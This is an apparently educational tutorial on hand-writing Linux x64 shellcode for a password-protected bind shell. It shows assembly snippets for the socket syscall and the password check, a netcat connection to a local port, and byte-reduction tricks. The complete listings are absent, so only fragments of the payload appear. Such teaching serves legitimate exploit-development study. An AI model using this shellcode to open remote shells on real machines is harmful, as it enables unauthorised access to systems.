Photo by Paul Esch-Laurent on Unsplash

Stage One: General Overview

First of all, what are we trying to achieve here? Our goal is to write shellcode for the Linux x64 architecture that will open a TCP over IPv4 socket, wait for an incoming connection and execute a shell only after the client provides a valid password.

In order to write a regular bind shell, we need to chain several syscalls. The exact order is the following (we’ll take care of the authentication later):

1- We create a new socket and bind it to the target address using the socket and bind syscalls

2- We make the socket stay open and wait for a connection using the listen syscall

3- Once an incoming connection is received, we use the accept syscall to establish the connection

4- We duplicate each standard stream into the new connection stream using the dup2 syscall, so the target machine can read and write messages to and from the source machine

5- We fire a shell by using the execve syscall

Each of these syscalls has a signature we need to address. Certain registers must contain specific values. For example, the rax register is used to identify the syscall that is executed so it should always contain the syscall number. A whole document containing a full syscall table can be found here.

Photo by Lorenzo Herrera on Unsplash

Stage Two: Writing a Syscall

Let’s see an example of how to execute a syscall

A Simple Syscall: Socket (0x29)

48c7c029000000 mov rax, 0x29 ; this is the socket syscall number

48c7c702000000 mov rdi, 0x02 ; 0x02 correponds with IPv4

4831f6 xor rsi, rsi

48ffc6 inc rsi ; 0x01 correponds with TCP

31d2 xor edx, edx ; 0 corresponds with protocol sub-family

0f05 syscall ; executes the syscall

Now, this code has some issue. First of all, it’s remarkably long (48 bytes to be precise). Second, it contains a lot of null bytes. Let’s try to fix that!

A More Realistic Approach: Socket (0x29)

The following implementation is 12 bytes long (a quarter of the last example) and contains no null bytes:

6a29 push 0x29

58 pop rax ; sets rax to 0x29 without nullbytes

6a02 push 0x02

5f pop rdi ; same technique for rdi

6a01 push 0x01

5e pop rsi ; same for rsi

99 cdq ; setting rdx to 0 using just one byte

0f05 syscall

Photo by 1AmFcS on Unsplash

Stage Three: Writing a Bind Shell

Armed with all our knowledge we now need to chain every syscall together. The following is an example implementation with added comments aimed to clarify each part of the process:

We can check the bind shell is working by assembling and linking this file, then extracting the shellcode and running it. I have some custom scripts that make this process a little bit easier by automating the assembly and linking process, the shellcode extraction and the generation of test skeletons to run our shellcode into. You may want to check those scripts and/or use them yourself (and report bugs/improvements of course!).

After having run our shellcode we should then connect from another terminal using netcat issuing the following command and a shell should popup:

nc 127.0.0.1 4444

Photo by Thomas Jensen on Unsplash

Stage Four: Adding Authentication

In order to add authentication, we need to read from the client file descriptor and compare the input against a password before executing the shell. The code should look roughly like this:

; 6 - Handle incoming connection ; 6.1 - Save client fd and close parent fd

mov r9, rax ; store the client socket fd into r9

; this is not mandatory, may be commented out to save some space

push syscalls.close

pop rax ; close parent

syscall ; 6.2 - Read password from the client fd

read_pass:

mov rax, r14 ; read syscall == 0x00

mov rdi, r9 ; from client fd

push 4

pop rdx ; rdx = input size

sub rsp, rdx

mov rsi, rsp ; rsi => buffer

syscall ; 6.3 - Check password

mov rax, config.password

mov rdi, rsi

scasq

jne read_pass

Basically, we read from the client file descriptor, then compare the input against a given password and repeat the process until it succeeds.

Here’s an example of how to use this auth mechanism:

Photo by John Petalcurin on Unsplash

Stage Five: Reducing the Payload

While working on the initial implementation null-bytes were avoided but I did not care much about size until this point. The payload is now 180 bytes in size. In order to remove null-bytes and reduce instruction size, I use radare2 rasm2 utility to compare instructions output. Here’s a simple case:

rasm2 -a x86 -b 64 "mov rax,29"

48c7c01d000000 rasm2 -a x86 -b 64 “mov al,29”

b01d

I replaced some of the constants into the code in order to find possible arithmetic instructions to replace the constants with. Used xchg instead of mov reg, reg when conditions allowed it. I Also used some x64 registers as constant holders for values that were used repeatedly or were problematic (like 0x00 and 0x10) so I could load values without having to push them on the stack or make any other arithmetic instruction first, this saving some bytes. Another trick was to use smaller register sizes when the situation allowed it (like r14d, r14w or r14b instead of the whole r14). The final version looks like this:

This last version is 163 bytes long. There’s probably a lot of room for improvement here still so I’m open to suggestions!